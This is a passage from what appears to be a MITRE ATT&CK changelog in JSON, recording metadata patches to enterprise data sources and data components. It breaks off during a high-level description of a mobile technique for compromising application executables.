Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:03.613Z", + "name": "Network Share", + "description": "A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:03.613Z\", \"old_value\": \"2025-04-18T15:09:58.319Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--3bef4799-906c-409c-ac00-3fb7a1e352e6", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0021", + "external_id": "DS0021" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:58.095Z", + "name": "Persona", + "description": "A malicious online profile representing a user commonly used by adversaries to social engineer or otherwise target victims", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + 
], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "OSINT" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:58.095Z\", \"old_value\": \"2025-04-16T20:39:12.210Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0014", + "external_id": "DS0014" + }, + { + "source_name": "Kube Kubectl", + "description": "kubernetes. (n.d.). kubectl. Retrieved October 13, 2021.", + "url": "https://kubernetes.io/docs/reference/kubectl/kubectl/" + }, + { + "source_name": "Kube Pod", + "description": "kubenetes. (n.d.). Pod v1 core. 
Retrieved October 13, 2021.", + "url": "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#pod-v1-core" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:58.983Z", + "name": "Pod", + "description": "A single unit of shared resources within a cluster, comprised of one or more containers(Citation: Kube Kubectl)(Citation: Kube Pod)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:58.983Z\", \"old_value\": \"2025-04-16T20:39:12.521Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0003", + "external_id": "DS0003" + }, + { + "source_name": "Microsoft Tasks", + "description": "Microsoft. (2018, May 31). Tasks. 
Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:05.238Z", + "name": "Scheduled Job", + "description": "Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers", + "Linux", + "Windows", + "macOS", + "ESXi" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:05.238Z\", \"old_value\": \"2025-04-18T15:11:33.637Z\"}}}", + "previous_version": "1.1" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0019", + "external_id": "DS0019" + }, + { + "source_name": "Microsoft Services", + "description": "Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications" + }, + { + "source_name": "Linux Services Run Levels", + "description": "The Linux Foundation. (2006, January 11). 
An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021.", + "url": "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:04.346Z", + "name": "Service", + "description": "A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "ESXi" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:04.346Z\", \"old_value\": \"2025-04-18T15:10:47.833Z\"}}}", + "previous_version": "1.1" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0020", + "external_id": "DS0020" + }, + { + "source_name": "Microsoft Snapshot", + "description": "Microsoft. (2021, September 16). Create a snapshot of a virtual hard disk. Retrieved October 13, 2021.", + "url": "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk" + }, + { + "source_name": "Amazon Snapshots", + "description": "Amazon. (n.d.). 
Amazon EBS snapshots. Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:55.198Z", + "name": "Snapshot", + "description": "A point-in-time copy of cloud volumes (files, settings, etc.) that can be created and/or deployed in cloud environments(Citation: Microsoft Snapshot)(Citation: Amazon Snapshots)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:55.198Z\", \"old_value\": \"2025-04-16T20:39:10.827Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--2cd6cc81-d86e-4595-a4f0-43f5519f14e6", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0005", + "external_id": "DS0005" + }, + { + "source_name": "Microsoft WMI System Classes", + "description": "Microsoft. (2018, May 31). WMI System Classes. Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes" + }, + { + "source_name": "Microsoft WMI Architecture", + "description": "Microsoft. (2018, May 31). WMI Architecture. 
Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:56.995Z", + "name": "WMI", + "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers(Citation: Microsoft WMI System Classes)(Citation: Microsoft WMI Architecture)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:56.995Z\", \"old_value\": \"2025-04-16T20:39:11.750Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0006", + "external_id": "DS0006" + }, + { + "source_name": "Medium Authentication Tokens", + "description": "Hsu, S. (2018, June 30). Session vs Token Based Authentication. Retrieved September 29, 2021.", + "url": "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4" + }, + { + "source_name": "Auth0 Access Tokens", + "description": "Auth0. (n.d.). Access Tokens. 
Retrieved September 29, 2021.", + "url": "https://auth0.com/docs/tokens/access-tokens" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:51.076Z", + "name": "Web Credential", + "description": "Credential material, such as session cookies or tokens, used to authenticate to web applications and services(Citation: Medium Authentication Tokens)(Citation: Auth0 Access Tokens)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "SaaS", + "Windows", + "macOS", + "Office Suite", + "Identity Provider" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:51.076Z\", \"old_value\": \"2025-04-16T20:39:08.491Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0024", + "external_id": "DS0024" + }, + { + "source_name": "Microsoft Registry", + "description": "Microsoft. (2018, May 31). Registry. 
Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:05.783Z", + "name": "Windows Registry", + "description": "A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:05.783Z\", \"old_value\": \"2025-04-16T20:39:08.970Z\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "datacomponents": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--071a09b1-8945-46fd-8bb7-6bcc89400963", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:48.777Z", + "name": "Image Modification", + "description": "Changes made to a virtual machine image, including setting and/or control data (ex: Azure Compute Service Images PATCH)", + "x_mitre_data_source_ref": "x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:48.777Z\", \"old_value\": \"2025-04-18T15:16:02.863Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:48:42.003Z", + "name": "Instance Metadata", + "description": "Contextual data about an instance and activity around it such as name, type, or status", + "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:48:42.003Z\", \"old_value\": \"2025-04-18T15:13:01.557Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:59.118Z", + "name": "Logon Session Metadata", + "description": "Contextual data about a logon session, such as 
username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:59.118Z\", \"old_value\": \"2025-04-18T15:12:23.075Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:56.271Z", + "name": "Scheduled Job Metadata", + "description": "Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:56.271Z\", \"old_value\": \"2025-04-18T15:11:39.543Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c", + "created": "2021-10-20T15:05:19.273Z", + 
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:52.137Z", + "name": "Service Metadata", + "description": "Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:52.137Z\", \"old_value\": \"2025-04-18T15:10:51.004Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--8bc66f94-54a9-4be4-bdd1-fe90df643774", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:42.387Z", + "name": "Snapshot Metadata", + "description": "Contextual data about a snapshot, which may include information such as ID, type, and status", + "x_mitre_data_source_ref": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:42.387Z\", \"old_value\": 
\"2025-04-18T15:15:14.954Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:17.060Z", + "name": "User Account Metadata", + "description": "Contextual data about an account, which may include a username, user ID, environmental data, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:17.060Z\", \"old_value\": \"2025-04-18T15:09:47.932Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--ec225357-8197-47a4-a9cd-57741d592877", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:47.887Z", + "name": "Volume Enumeration", + "description": "An extracted list of available volumes within a cloud environment (ex: AWS describe-volumes)", + "x_mitre_data_source_ref": "x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": 
"{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:47.887Z\", \"old_value\": \"2025-04-18T15:17:22.350Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--0f72bf50-35b3-419d-ab95-70f9b6a818dd", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:38.106Z", + "name": "Volume Metadata", + "description": "Contextual data about a cloud volume and activity around it, such as id, type, state, and size", + "x_mitre_data_source_ref": "x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:38.106Z\", \"old_value\": \"2025-04-18T15:17:15.849Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--d46272ce-a0fe-4256-855e-738de7bb63ee", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:35.774Z", + "name": "Volume Modification", + "description": "Changes made to a cloud volume, including its settings and control data (ex: AWS modify-volume)", + "x_mitre_data_source_ref": "x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", 
+ "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:35.774Z\", \"old_value\": \"2025-04-18T15:17:12.667Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--5f7c9def-0ddf-423b-b1f8-fb2ddeed0ce3", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:08.104Z", + "name": "Web Credential Creation", + "description": "Initial construction of new web credential material (ex: Windows EID 1200 or 4769)", + "x_mitre_data_source_ref": "x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:08.104Z\", \"old_value\": \"2025-04-18T15:13:30.118Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--ff93f688-d7a4-49cf-9c79-a14454da8428", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:48:47.351Z", + "name": "Web Credential Usage", + "description": "An attempt by a user to gain access to a network or computing resource by providing web credentials 
(ex: Windows EID 1202)", + "x_mitre_data_source_ref": "x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:48:47.351Z\", \"old_value\": \"2025-04-18T15:13:26.927Z\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + } + }, + "mobile-attack": { + "techniques": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d3bc5020-f6a2-41c0-8ccb-5e563101b60c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-07 15:24:49.068000+00:00", + "modified": "2025-04-25 15:16:40.355000+00:00", + "name": "Compromise Application Executable", + "description": "Adversaries may modify applications installed on a device to establish persistent access to a victim. These malicious modifications can be used to make legitimate applications carry out adversary tasks when these applications are in use.\n\nThere are multiple ways an adversary can inject malicious code into applications. One method is by taking advantages of device vulnerabilities, the most well-known being Janus, an Android vulnerability that allows adversaries to add extra bytes to APK (application) and DEX (executable) files without affecting the file's signature. 
